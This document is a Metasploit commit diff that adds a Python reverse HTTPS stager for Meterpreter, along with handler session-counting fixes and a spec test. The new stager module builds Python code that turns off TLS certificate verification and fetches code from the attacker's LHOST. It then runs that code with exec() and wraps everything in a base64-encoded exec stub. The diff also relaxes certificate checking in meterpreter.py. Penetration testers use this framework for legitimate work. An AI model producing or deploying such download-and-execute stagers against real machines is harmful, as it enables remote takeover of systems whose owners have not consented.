Land rapid7#4978 @zeroSteiner adds reverse https for python meterpreter

Author: Brent Cook

data/meterpreter/meterpreter.py

@@ -264,7 +264,7 @@ def tlv_pack(*args):
 		data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8')
 	else:
 		value = tlv['value']
-		if sys.version_info[0] < 3 and isinstance(value, __builtins__['unicode']):
+		if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode':
 			value = value.encode('UTF-8')
 		elif not is_bytes(value):
 			value = bytes(value, 'UTF-8')
@@ -393,11 +393,17 @@ def debug_print(self, msg):
 			print(msg)
 
 	def driver_init_http(self):
+		opener_args = []
+		scheme = HTTP_CONNECTION_URL.split(':', 1)[0]
+		if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2,7,9)) or sys.version_info >= (3,4,3)):
+			import ssl
+			ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
+			ssl_ctx.check_hostname=False
+			ssl_ctx.verify_mode=ssl.CERT_NONE
+			opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
 		if HTTP_PROXY:
-			proxy_handler = urllib.ProxyHandler({'http': HTTP_PROXY})
-			opener = urllib.build_opener(proxy_handler)
-		else:
-			opener = urllib.build_opener()
+			opener_args.append(urllib.ProxyHandler({scheme: HTTP_PROXY}))
+		opener = urllib.build_opener(*opener_args)
 		if HTTP_USER_AGENT:
 			opener.addheaders = [('User-Agent', HTTP_USER_AGENT)]
 		urllib.install_opener(opener)

lib/msf/core/handler.rb

@@ -77,6 +77,9 @@ def initialize(info = {})
     # Initialize the pending_connections counter to 0
     self.pending_connections = 0
 
+    # Initialize the sessions counter to 0
+    self.sessions = 0
+
     # Create the waiter event with auto_reset set to false so that
     # if a session is ever created, waiting on it returns immediately.
     self.session_waiter_event = Rex::Sync::Event.new(false, false)
@@ -234,10 +237,14 @@ def register_session(session)
     # Decrement the pending connections counter now that we've processed
     # one session.
     self.pending_connections -= 1
+
+    # Count the number of sessions we have registered
+    self.sessions += 1
   end
 
   attr_accessor :session_waiter_event # :nodoc:
   attr_accessor :pending_connections  # :nodoc:
+  attr_accessor :sessions # :nodoc:
 
 end
 

lib/msf/core/handler/reverse_http.rb

@@ -163,7 +163,7 @@ def setup_handler
   def stop_handler
     if self.service
       self.service.remove_resource("/")
-      Rex::ServiceManager.stop_service(self.service) if self.pending_connections == 0
+      Rex::ServiceManager.stop_service(self.service) if self.sessions == 0
     end
   end
 
@@ -220,6 +220,8 @@ def on_request(cli, req, obj)
 
     uri_match = process_uri_resource(req.relative_resource)
 
+    self.pending_connections += 1
+
     # Process the requested resource.
     case uri_match
       when /^\/INITPY/
@@ -255,7 +257,6 @@ def on_request(cli, req, obj)
           :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
           :ssl                => ssl?,
         })
-        self.pending_connections += 1
 
       when /^\/INITJM/
         conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
@@ -346,6 +347,7 @@ def on_request(cli, req, obj)
         resp.code    = 200
         resp.message = "OK"
         resp.body    = datastore['HttpUnknownRequestResponse'].to_s
+        self.pending_connections -= 1
     end
 
     cli.send_response(resp) if (resp)

modules/payloads/stagers/python/reverse_https.rb

@@ -0,0 +1,126 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_https'
+
+module Metasploit3
+
+  CachedSize = 742
+
+  include Msf::Payload::Stager
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Python Reverse HTTPS Stager',
+      'Description'   => 'Tunnel communication over HTTP using SSL',
+      'Author'        => 'Spencer McIntyre',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'python',
+      'Arch'          => ARCH_PYTHON,
+      'Handler'       => Msf::Handler::ReverseHttps,
+      'Stager'        => {'Payload' => ""}
+    ))
+
+    register_options(
+      [
+        OptString.new('PayloadProxyHost', [false, "The proxy server's IP address"]),
+        OptPort.new('PayloadProxyPort', [true, "The proxy port to connect to", 8080 ])
+      ], self.class)
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    lhost = datastore['LHOST'] || '127.127.127.127'
+
+    var_escape = lambda { |txt|
+      txt.gsub('\\', '\\'*4).gsub('\'', %q(\\\'))
+    }
+
+    if Rex::Socket.is_ipv6?(lhost)
+      target_url = "https://[#{lhost}]"
+    else
+      target_url = "https://#{lhost}"
+    end
+
+    target_url << ':'
+    target_url << datastore['LPORT'].to_s
+    target_url << '/'
+    target_url << generate_callback_uri
+
+    proxy_host = datastore['PayloadProxyHost'].to_s
+    proxy_port = datastore['PayloadProxyPort'].to_i
+
+    if proxy_host == ''
+      urllib_fromlist = "['HTTPSHandler','build_opener']"
+    else
+      urllib_fromlist = "['HTTPSHandler','ProxyHandler','build_opener']"
+    end
+
+    cmd  = "import sys\n"
+    cmd << "vi=sys.version_info\n"
+    cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=#{urllib_fromlist})\n"
+    cmd << "hs=[]\n"
+    # Context added to HTTPSHandler in 2.7.9 and 3.4.3
+    cmd << "if (vi[0]==2 and vi>=(2,7,9)) or vi>=(3,4,3):\n"
+    cmd << "\timport ssl\n"
+    cmd << "\tsc=ssl.SSLContext(ssl.PROTOCOL_SSLv23)\n"
+    cmd << "\tsc.check_hostname=False\n"
+    cmd << "\tsc.verify_mode=ssl.CERT_NONE\n"
+    cmd << "\ths.append(ul.HTTPSHandler(0,sc))\n"
+
+    if proxy_host != ''
+      proxy_url = Rex::Socket.is_ipv6?(proxy_host) ?
+        "http://[#{proxy_host}]:#{proxy_port}" :
+        "http://#{proxy_host}:#{proxy_port}"
+      cmd << "hs.append(ul.ProxyHandler({'https':'#{var_escape.call(proxy_url)}'}))\n"
+    end
+
+    cmd << "o=ul.build_opener(*hs)\n"
+    cmd << "o.addheaders=[('User-Agent','#{var_escape.call(datastore['MeterpreterUserAgent'])}')]\n"
+    cmd << "exec(o.open('#{target_url}').read())\n"
+
+    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
+    b64_stub  = "import base64,sys;exec(base64.b64decode("
+    b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
+    b64_stub << Rex::Text.encode_base64(cmd)
+    b64_stub << "')))"
+    return b64_stub
+  end
+
+  #
+  # Determine the maximum amount of space required for the features requested
+  #
+  def required_space
+    # Start with our cached default generated size
+    space = cached_size
+
+    # Add 100 bytes for the encoder to have some room
+    space += 100
+
+    # Make room for the maximum possible URL length
+    space += 256
+
+    # The final estimated size
+    space
+  end
+
+  #
+  # Return the longest URL that fits into our available space
+  #
+  def generate_callback_uri
+    uri_req_len = 30 + rand(256-30)
+
+    # Generate the short default URL if we don't have enough space
+    if self.available_space.nil? || required_space > self.available_space
+      uri_req_len = 5
+    end
+
+    generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITP, uri_req_len)
+  end
+
+end

spec/modules/payloads_spec.rb

@@ -2045,6 +2045,17 @@
                           reference_name: 'python/meterpreter/reverse_http'
   end
 
+  context 'python/meterpreter/reverse_https' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'stagers/python/reverse_https',
+                            'stages/python/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'python/meterpreter/reverse_https'
+  end
+
   context 'python/meterpreter/reverse_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [